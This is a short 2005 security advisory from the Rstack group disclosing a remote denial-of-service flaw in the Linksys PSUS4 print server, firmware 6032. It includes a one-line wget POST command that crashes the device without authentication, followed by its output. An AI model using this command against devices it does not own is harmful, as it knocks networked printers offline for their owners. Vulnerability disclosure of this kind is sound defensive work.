- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Rstack Public Security Advisory RSTACK SA200502-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://rstack.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Linksys PSUS4 remote Denial of Service Date: February 02, 2005 ID: 200502-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Background ========== PSUS4 is one of the small embedded Linksys wired print servers. Affected products ================= Model Name: PSUS4 (not tested against others) Firmware Version: 6032 (not tested against others) Description =========== Rstack team found a tiny denial of service on the Linksys PSUS4. This device has problems to handle some weird ugly HTTP requests. No password needed. Here is an example, to crash a remote PSUS4 : $ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/ --23:10:05-- http://192.168.1.2/ => `index.html' Connecting to 192.168.1.2:80... connected. HTTP request sent, awaiting response... => And the PSUS4 is crashed. Impact ====== A remote attacker could crash the device (DOS). Workaround ========== There is no official workaround at that time. Linksys has been contacted and a patch should be available in the future (*). In needed, you can try to filter incoming requests by using a specific dedicated reverse proxy, but that might be a too big solution for such a little device (hint: a reboot will be necessary after each crash). (*) "ou pas"...